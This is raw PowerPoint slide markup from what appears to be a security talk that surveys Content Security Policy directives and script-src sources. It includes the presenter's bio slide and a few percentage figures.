              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="4631"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="769851"/>
            <a:ext cx="12192000" cy="5897880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{023D405A-6C6A-F712-D544-9FED9CC403D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4188758" y="285308"/>
            <a:ext cx="3814483" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Most Frequent CSP directives</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{854C0C11-5B59-C76A-88AD-F105F150F5C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="352425" y="480060"/>
            <a:ext cx="2181225" cy="28979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59767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D3F5138-9EEF-E36F-59B4-58B1DCD0E660}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="4631" r="81484" b="60379"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2886075" y="1317614"/>
            <a:ext cx="4619625" cy="4428130"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{023D405A-6C6A-F712-D544-9FED9CC403D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4188758" y="285308"/>
            <a:ext cx="3814483" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Most Frequent CSP directives</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{854C0C11-5B59-C76A-88AD-F105F150F5C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="352425" y="480060"/>
            <a:ext cx="2181225" cy="28979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4837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D3F5138-9EEF-E36F-59B4-58B1DCD0E660}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="5077" t="53945" r="72969" b="6627"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2876550" y="1371599"/>
            <a:ext cx="5126691" cy="4670577"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{023D405A-6C6A-F712-D544-9FED9CC403D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4188758" y="285308"/>
            <a:ext cx="3814483" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Most Frequent CSP directives</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{854C0C11-5B59-C76A-88AD-F105F150F5C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="352425" y="480060"/>
            <a:ext cx="2181225" cy="28979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14626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graph&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{437C7011-8D05-4A41-B351-1FCEC03ED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0" y="335279"/>
            <a:ext cx="12206560" cy="6194830"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE5348CF-F28D-C869-8A31-B179124FC61D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4188758" y="285308"/>
            <a:ext cx="3814483" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Frequent sources of script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF7900"/>
              </a:solidFill>
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1777870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874D0-0479-9966-CF42-2CEDC46D01B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640080" y="325369"/>
            <a:ext cx="4368602" cy="1956841"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="5400" dirty="0" err="1">
                <a:latin typeface="HACKED" panose="02000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="5400" dirty="0">
              <a:latin typeface="HACKED" panose="02000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4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FDAFEA-BC96-7265-6E45-8890736A525D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640080" y="2909771"/>
            <a:ext cx="4243589" cy="3320668"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Felipe Molina de la Torre</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Working with Orange </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1">
                <a:latin typeface="Helvetica" panose="020B0604020202020204"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Cyberdefense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1">
                <a:latin typeface="Helvetica" panose="020B0604020202020204"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>SensePost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>) for the last 4+ years</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Working in digital security for 10+ years</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Proud Dad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Simpsons and Futurama Fan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Twitter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>@felmoltor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="A person standing with his arms crossed&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BB59257-FA4D-0FF7-2909-B9E77EC01C3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="2511" r="2226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77250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graph&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{437C7011-8D05-4A41-B351-1FCEC03ED112}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="9197" t="6113" r="71164" b="58977"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2951349" y="1279282"/>
            <a:ext cx="4994742" cy="4505650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE5348CF-F28D-C869-8A31-B179124FC61D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4188758" y="285308"/>
            <a:ext cx="3814483" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Frequent sources of script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF7900"/>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204C1744-A0A8-6E55-CDC7-8964E176C87B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8348291" y="1664898"/>
            <a:ext cx="1824409" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~23% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(24K/104K)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C53FCB0E-AF39-CE35-B16F-A0FDC207A205}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8348291" y="2329624"/>
            <a:ext cx="1824409" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~21% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(22K/104K)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A collage of a person's face&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{509DAEE1-ED2B-08D4-0558-A46A8C604B17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="60952" t="52181" r="19657"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="575794" y="4297578"/>
            <a:ext cx="2375555" cy="2191157"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A collage of a person's face&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{887F2E38-1820-5610-2454-E87AB2B0C159}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="41413" t="84006" r="39539" b="1285"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="575794" y="5784932"/>
            <a:ext cx="2375555" cy="686200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="330138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graph&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{437C7011-8D05-4A41-B351-1FCEC03ED112}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="2070" t="46714" r="66561" b="5776"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2779057" y="1733550"/>
            <a:ext cx="5631518" cy="4328703"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE5348CF-F28D-C869-8A31-B179124FC61D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4188758" y="285308"/>
            <a:ext cx="3814483" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Frequent sources of script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF7900"/>
              </a:solidFill>
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1686439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map of the world&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA40CEFD-2746-6468-4C30-39C6A08F2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2" y="1302874"/>
            <a:ext cx="12290612" cy="5555126"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Title 1">
            <a:extLst>
